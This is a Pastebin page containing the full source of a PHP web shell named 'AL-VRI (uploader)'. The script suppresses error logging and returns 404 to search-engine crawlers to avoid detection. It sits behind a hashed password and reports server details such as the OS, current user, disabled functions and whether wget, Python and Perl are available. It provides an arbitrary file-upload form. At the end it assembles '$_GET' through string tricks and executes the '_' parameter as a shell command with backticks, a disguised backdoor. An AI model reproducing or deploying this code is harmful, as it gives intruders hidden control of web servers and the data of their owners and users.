Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- session_start();
- error_reporting(0);
- set_time_limit(0);
- @set_magic_quotes_runtime(0);
- @clearstatcache();
- @ini_set("error_log",NULL);
- @ini_set("log_errors",0);
- @ini_set("max_execution_time",0);
- @ini_set("output_buffering",0);
- @ini_set("display_errors", 0);
- $password = "1e7709da5a292b3021adf92e1406c36d";
- if(!empty($_SERVER["HTTP_USER_AGENT"])) {
- $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
- if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER["HTTP_USER_AGENT"])) {
- header("HTTP/1.0 404 Not Found");
- exit;
- }
- }
- if(get_magic_quotes_gpc()) {
- function ss($array) {
- return is_array($array) ? array_map("ss", $array) : stripslashes($array);
- }
- $_POST = ss($_POST);
- }
- function judul() { ?>
- <title><?php echo "". $_SERVER[HTTP_HOST] .""; ?> — AL-VRI (uploader) </title>
- <link href="data:image/ico;base64,AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAAAAE4AAABNAAAATQAAAE0AAABNAAAATQAAAE0AAABNAAAATQAAAE0AAABNAAAATQAAAE0AAABPAAAAH/r/9On///////////////////////////////////////////////////////////////////////////n/8sv9//vn///////////////////////////////////////////////////////////////////////////8//jM/v/95v///////////////////////////////////////////////////////////////////////////f/6yv///+X//////////////////////////////////////////////////////////////////////////////cj//v7l///////////////////////////////////////////////////////////////////////////////I/v/45P/////////+/////v////7////+/////v////7////+/////v////7////+/////v////7//////v/4xwAA1eUTAND/GADP/xQAzv8NAMz/CwDM/wwAzP8MAMz/DADM/wwAzP8MAMz/DADM/woAzP8GAMz/AADP/wAA68g1HdvlOyXW/z0o1f8+KtX/PyvV/zwo1P84JNL/NCHR/zMg0f8zINH/MyDR/zMg0f8yH9H/MB3R/y8b1P81GvHINh7b5T4n1/9AKtb/QSzW/0Et1v9CLtb/Qi7W/0Iu1v9BLdb/PyvV/z4q1f8+KtX/PynV/z8p1f8/J9n/Oh/zyDce3OVBKdn/QizX/0Mt1/9ELtf/RC7X/0Qv1/9EL9f/RS/X/0Uv1/9FL9f/RC7X/0Mu1/9CK9b/QSja/zgf88g3HtzmQCXa/0Eo2P9CKtj/QirY/0Mr2P9DK9j/QyvY/0Mr2P9DK9j/QivY/0Iq2P9CKdj/QSfY/0El3P84H/PJNiTX4mJS3/9gUN3/YVHd/2FR3f9hUd3/YVHd/2FR3f9hUd3/YVHd/2FR3f9hUd3/YVHd/2BQ3f9gT+D/LxnywgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//wAA//8AAA==" rel="icon" type="image/x-icon"> <?php
- }
- function login() { ?>
- <head>
- <style type="text/css">
- input[type=password] {
- width: 250px;
- height: 25px;
- color: red;
- background: #000000;
- border: 1px dotted green;
- padding: 5px;
- margin-left: 20px;
- text-align: center;
- }
- </style>
- </head>
- <body>
- <center>
- <form method="post">
- <input type="password" name="password">
- </form>
- </center>
- </body> <?php exit;
- }
- function w($dir,$perm) {
- if(!is_writable($dir)) {
- return "<font color=red>".$perm."</font>";
- }
- else {
- return "<font color=lime>".$perm."</font>";
- }
- }
- function r($dir,$perm) {
- if(!is_readable($dir)) {
- return "<font color=red>".$perm."</font>";
- }
- else {
- return "<font color=lime>".$perm."</font>";
- }
- }
- function exe($cmd) {
- if(function_exists("system")) {
- @ob_start();
- @system($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- }
- elseif(function_exists("exec")) {
- @exec($cmd,$results);
- $buff = "";
- foreach($results as $result) {
- $buff .= $result;
- }
- return $buff;
- }
- elseif(function_exists("passthru")) {
- @ob_start();
- @passthru($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- }
- elseif(function_exists("shell_exec")) {
- $buff = @shell_exec($cmd);
- return $buff;
- }
- }
- function perms($file) {
- $perms = fileperms($file);
- if (($perms & 0xC000) == 0xC000) {
- $info = 's'; //socket
- }
- elseif (($perms & 0xA000) == 0xA000) {
- $info = 'l'; //symbolic link
- }
- elseif (($perms & 0x8000) == 0x8000) {
- $info = '-'; //regular
- }
- elseif (($perms & 0x6000) == 0x6000) {
- $info = 'b'; //block special
- }
- elseif (($perms & 0x4000) == 0x4000) {
- $info = 'd'; //directory
- }
- elseif (($perms & 0x2000) == 0x2000) {
- $info = 'c'; //character special
- }
- elseif (($perms & 0x1000) == 0x1000) {
- $info = 'p'; //FIFO pipe
- }
- else {
- $info = 'u'; //unknown
- }
- //owner
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- //group
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- //world
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- function hdd($s) {
- if($s >= 1073741824) {
- return sprintf("%1.2f", $s / 1073741824 )." GB";
- }
- elseif($s >= 1048576) {
- return sprintf("%1.2f", $s / 1048576 ) ." MB";
- }
- elseif($s >= 1024) {
- return sprintf("%1.2f", $s / 1024 ) ." KB";
- }
- else {
- return $s ." B";
- }
- }
- function keterangan() { ?>
- <body> <?php
- if(isset($_GET["dir"])) {
- $dir = $_GET["dir"];
- chdir($dir);
- }
- else {
- $dir = getcwd();
- }
- $software = getenv("SERVER_SOFTWARE");
- $system = php_uname();
- $php = "".phpversion()." on ".php_sapi_name()."";
- $ip = gethostbyname($_SERVER["HTTP_HOST"]);
- $admin = $_SERVER["SERVER_ADMIN"];
- $dir = str_replace("\\","/",$dir);
- $scdir = explode("/", $dir);
- $freespace = hdd(disk_free_space("/"));
- $total = hdd(disk_total_space("/"));
- $used = $total-$freespace;
- $safemode = (@ini_get(strtolower("safe_mode")) == "on") ? "<font color=red>ON</font>" : "<font color=\"white\">OFF</font>";
- $ds = @ini_get("disable_functions");
- $disfunction = (!empty($ds)) ? "<font color=\"red\">$ds</font>" : "<font color=\"white\">NONE</font>";
- $mysql = (function_exists("mysql_connect")) ? "<font color=\"white\">ON</font>" : "<font color=\"red\">OFF</font>";
- $mssql = (function_exists("mssql_connect")) ? "<font color=\"white\">ON</font>" : "<font color=\"red\">OFF</font>";
- $python = (exe("python --help")) ? "<font color=\"white\">ON</font>" : "<font color=\"red\">OFF</font>";
- $oracle = (function_exists("ocilogon")) ? "<font color=\"white\">ON</font>" : "<font color=\"red\">OFF</font>";
- $perl = (exe("perl --help")) ? "<font color=\"white\">ON</font>" : "<font color=\"red\">OFF</font>";
- $curl = (function_exists("curl_version")) ? "<font color=\"white\">ON</font>" : "<font color=\"red\">OFF</font>";
- $wget = (exe("wget --help")) ? "<font color=\"white\">ON</font>" : "<font color=\"red\">OFF</font>";
- if(!function_exists("posix_getegid")) {
- $user = @get_current_user();
- $uid = @getmyuid();
- $gid = @getmygid();
- $group = "?";
- }
- else {
- $uid = @posix_getpwuid(posix_geteuid());
- $gid = @posix_getgrgid(posix_getegid());
- $user = $uid["name"];
- $uid = $uid["uid"];
- $group = $gid["name"];
- $gid = $gid["gid"];
- } echo "
- <table>
- <tr>
- <th>Software</th>
- <th><font color=\"orange\">:</font></th>
- <th><font color=\"white\">".$software."</font></th>
- </tr>
- <tr>
- <th>System</th>
- <th><font color=\"orange\">:</font></th>
- <th><font color=\"white\">".$system."</font></th>
- </tr>
- <tr>
- <th>PHP version</th>
- <th><font color=\"orange\">:</font></th>
- <th><font color=\"white\">".$php."</font></th>
- </tr>
- <tr>
- <th>User</th>
- <th><font color=\"orange\">:</font></th>
- <th><font color=\"white\">".$user." (".$uid.")</font> <font color=\"orange\">|</font> Group<font color=\"orange\">:</font> <font color=\"white\">".$group." (".$gid.")</font></th>
- </tr>
- <tr>
- <th>Server IP</th>
- <th><font color=\"orange\">:</font></th>
- <th><font color=\"white\">".$ip."</font> <font color=\"orange\">|</font> Your IP<font color=\"orange\">:</font> <font color=\"white\">".$_SERVER['REMOTE_ADDR']."</font> <font color=\"orange\">|</font> Admin<font color=\"orange\">:</font> <font color=\"white\">".$admin."</font></th>
- </tr>
- <tr>
- <th>HDD</th>
- <th><font color=\"orange\">:</font></th>
- <th><font color=\"white\">".$used."/".$total." (</font>Free<font color=\"orange\">:</font> <font color=\"white\">".$freespace.")</font></th>
- </tr>
- <tr>
- <th>Safe Mode</th>
- <th><font color=\"orange\">:</font></th>
- <th>".$safemode."</th>
- </tr>
- <tr>
- <th>Disable Functions</th>
- <th><font color=\"orange\">:</font></th>
- <th>".$disfunction."</th>
- </tr>
- <tr>
- <th>Information</th>
- <th><font color=\"orange\">:</font></th>
- <th>MySQL<font color=\"orange\">:</font> ".$mysql." <font color=\"orange\">|</font> MSSQL<font color=\"orange\">:</font> <font color=lime>".$mssql."</font> <font color=\"orange\">|</font> Python<font color=\"orange\">:</font> ".$python." <font color=\"orange\">|</font> Oracle<font color=\"orange\">:</font> <font color=lime>".$oracle."</font> <font color=\"orange\">|</font> Perl<font color=\"orange\">:</font> ".$perl." <font color=\"orange\">|</font> CURL<font color=\"orange\">:</font> ".$curl." <font color=\"orange\">|</font> WGET<font color=\"orange\">:</font> ".$wget."</th>
- </tr>
- <tr>
- <th>Current DIR</th>
- <th><font color=\"orange\">:</font></th>
- <th><font color=\"white\">";
- foreach($scdir as $c_dir => $cdir) {
- echo "$cdir/";
- }
- echo "</font> <font color=\"orange\">[</font> ".w($dir, perms($dir))." <font color=\"orange\">]</font>
- </th>
- </tr>
- </table>
- <br><br> "; ?>
- </body> <?php
- }
- if($_GET["al"] == "vri") { ?>
- <html>
- <head> <?php
- judul(); ?>
- <style type="text/css">
- html {
- background: #000000;
- color: black;
- font-family: "Courier New";
- font-size: 15px;
- }
- a {
- text-decoration: none;
- }
- table, th, td {
- background: transparent;
- font-size: 13px;
- color: lime;
- text-align: left;
- }
- </style>
- </head> <?php
- keterangan();
- if(!isset($_SESSION[md5($_SERVER["HTTP_HOST"])])) {
- if( empty($password) || ( (isset($_POST["password"])) && (md5($_POST["password"])==$password) ) ) {
- $_SESSION[md5($_SERVER["HTTP_HOST"])] = true;
- }
- else {
- login();
- }
- } echo "
- <center>
- <font color=\"orange\">[</font> <a style=\"color: red; text-decoration:none;\" href=\"?al=vri&logout=true\">Logout</a> <font color=\"orange\">]</font>
- <br><br>
- <font color=\"pink\">
- <form method=\"post\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"filetoupload\"> <input type=\"submit\" value=\"upload\" name=\"submit\">
- </form>
- </font>
- </center> ";
- if(isset($_POST["submit"])) {
- echo "<center>";
- if (@copy($_FILES["filetoupload"]["tmp_name"], $_FILES["filetoupload"]["name"])) {
- echo "<a href=\" ".$_FILES["filetoupload"]["name"]." \" style=\"text-decoration:none\"><font color=\"white\"> ". basename( $_FILES["filetoupload"]["name"])." </font></a><font color=\"#7FFF00\"> => </font><font color=\"#4169E1\">success</font>";
- }
- else {
- echo "<font color=\"white\"> ".basename( $_FILES["filetoupload"]["name"])." </font><font color=\"#7FFF00\"> => </font><font color=red>failed</font>";
- }
- echo "<br><br></center>";
- } ?>
- </html> <?php
- $_ = range("A","Z");
- $_ = $_[6].$_[4].$_[19];
- $_ = ${'_'.$_}['_']; ?>
- <center><font color="orange"><br><?=`$_`; ?><br><br></font></center> <?php
- if($_GET["logout"] == true) {
- unset($_SESSION[md5($_SERVER["HTTP_HOST"])]);
- echo "<script>window.location=\"?al=vri\";</script>";
- }
- } ?>
Add Comment
Please, Sign In to add comment